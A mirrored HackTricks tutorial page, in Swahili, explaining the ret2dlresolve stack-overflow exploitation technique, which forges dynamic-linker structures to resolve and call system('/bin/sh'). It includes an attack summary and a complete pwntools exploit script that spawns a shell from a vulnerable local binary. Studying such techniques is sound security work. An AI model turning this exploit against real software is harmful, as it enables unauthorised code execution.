maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md

66 lines
3.1 KiB
Markdown
Raw Blame History

# Ret2dlresolve
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
Kama ilivyoelezwa katika ukurasa kuhusu [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) na [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries bila Full Relro zitatatua alama (kama anwani za maktaba za nje) mara ya kwanza zinapotumika. Hii kutatua inatokea kwa kuita kazi **`_dl_runtime_resolve`**.
Kazi ya **`_dl_runtime_resolve`** inachukua kutoka kwenye stack marejeleo ya baadhi ya muundo inahitaji ili kutatua alama iliyotajwa.
Kwa hivyo, inawezekana **kujifanya muundo huu wote** ili kufanya kutatua kiungo cha dinamikali alama iliyotakiwa (kama kazi ya **`system`**) na kuitwa na parameter iliyowekwa (mfano **`system('/bin/sh')`**).
Kawaida, muundo huu wote unajifanywa kwa kufanya **mnyororo wa ROP wa awali unaoitwa `read`** juu ya kumbukumbu inayoweza kuandikwa, kisha **muundo** na mfuatano **`'/bin/sh'`** hupitishwa ili kuhifadhiwa na kusoma katika eneo lililojulikana, na kisha mnyororo wa ROP unaendelea kwa kuita **`_dl_runtime_resolve`** na anwani ya `$'/bin/sh'`.
> [!TIP]
> Mbinu hii ni muhimu hasa ikiwa hakuna syscall gadgets (kutumia mbinu kama [**ret2syscall**](rop-syscall-execv.md) au [SROP](srop-sigreturn-oriented-programming.md)) na hakuna njia za kuvuja anwani za libc.
Unaweza kupata maelezo bora kuhusu mbinu hii katika nusu ya pili ya video:
{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}
## Structures
Ni muhimu kujifanya muundo 3: **`JMPREL`**, **`STRTAB`** na **`SYMTAB`**. Una maelezo bora kuhusu jinsi haya yanavyoundwa katika [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)
## Attack Summary
1. Andika muundo wa uwongo mahali fulani
2. Weka hoja ya kwanza ya system (`$rdi = &'/bin/sh'`)
3. Weka kwenye stack anwani za muundo ili kuita **`_dl_runtime_resolve`**
4. **Kuita** `_dl_runtime_resolve`
5. **`system`** itatatuliwa na kuitwa na `'/bin/sh'` kama hoja
## Example
Unaweza kupata [**mfano wa mbinu hii hapa**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **ikiwemo maelezo mazuri ya mnyororo wa mwisho wa ROP**, lakini hapa kuna exploit ya mwisho iliyotumika:
```python
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()
```
## Marejeleo
- [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared)
- [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
{{#include ../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink